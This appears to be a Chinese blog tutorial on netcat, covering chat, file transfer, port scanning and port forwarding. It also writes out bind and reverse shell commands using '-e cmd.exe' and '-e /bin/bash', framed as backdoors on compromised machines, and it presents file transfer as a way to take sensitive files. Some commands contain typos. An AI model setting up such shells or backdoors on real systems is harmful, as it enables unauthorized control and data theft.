netcat

简介

在网络工具中有瑞士军刀美誉的Netcat,在我们用了N年,至今仍然爱不释手。这是一个非常简
单易用的基于tcp/ip协议的瑞士军刀。

下载链接:netcat 1.11 for Win32/Win64

 

使用场景:

 

基本使用

1.创建服务端方法:nc -l -p [localport]

2.创键客户端方法(用来连接服务端)
nc [remote addr][remoteport]
这里仅仅实现了一个简单的通信系统,并不能对机器进行命令执行

 

返回shell的使用


创键服务端的方法
nc -I -p [localport] -e cmd.exe

创键客户端方法(用来连接服务端)

nc [remote_addr] [remoteport]

Netcat文件传输与信息探测

文件传输使用场景
1.取证
当目标机器被黑客攻击之后,取证人员可以利用c的文件传输功能来获取目标机器上的文件内容。
避免直接在目标机器上进行操作造成取证的误差。
2.单纯获取目标机器敏感文件
当目标机器上有一些文件内容,无法正常下载时,可以利用c进行文件传输。
创建服务器端nc -l -p [localport] > outfile

客户端nc [remoteip][remoteport] < infile

客户端向服务端传送文件

 

 服务端向客户端传送文件

创建服务器端nc -l -p [localport] < infile

客户端nc [remoteip][remoteport] > outfile

 

 信息探测使用场景


1.目标内网的扫描
当获得目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时刚好具有一
个netcat的话,就可以使用netcat.进行内网ip和端口的扫描
2.单纯对某个目标进行端口探测
当手头没有任何探测工具可以使用netcat进行端口探测

端口扫描使用方法


nc -v -n -z w1 [target_ip][start_target_port-stop_target_port]
-v表示对错误进行详细输出
-n不对目标机器进行DNS解析
-z zero l/0模式,专用于端口扫描。表示对目标IP发送的数据表中不包含任何pay load
这样做可以加快扫描的速度
-w1超时设置为1秒

 netcat建立后门

使用场景
获取目标的命令执行权限
当目标机器上存在netcat之后,可以使用netcat建立后门,来实现执行目标命令的功能
windows建立后门使用方法
监听型后门:nc -l -p 4444 -e cmd.exe
连接型后门nc [remote_ip] [remote._port] -e cmd.exe
无论是何种后门,都需要使用-e cmd.exe来返回对应的cmd.exe

L inux建立后门使用方法
监听型后门:nc- l -p 4444 -e /bin/bash
连接型后门:nc [remote_ip] [remote._port] -e /bin/bash
无论是何种后门,都需要使用- /ebin/bash来返回对应的shelI

netcat连接转发

 为什么需要转发?
突破某些特殊情况下的连接限制,以及处理一些特殊情况。

echo nc [target][port]>delay.bat
nc -I -p [localport]-e delay.bat
当有客户端连接该服务端时,连接的客户端和通过服务端连接到target port上。实
现了连接转发功能。(端口转发)

                                                                                                                              ————水滴石穿

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值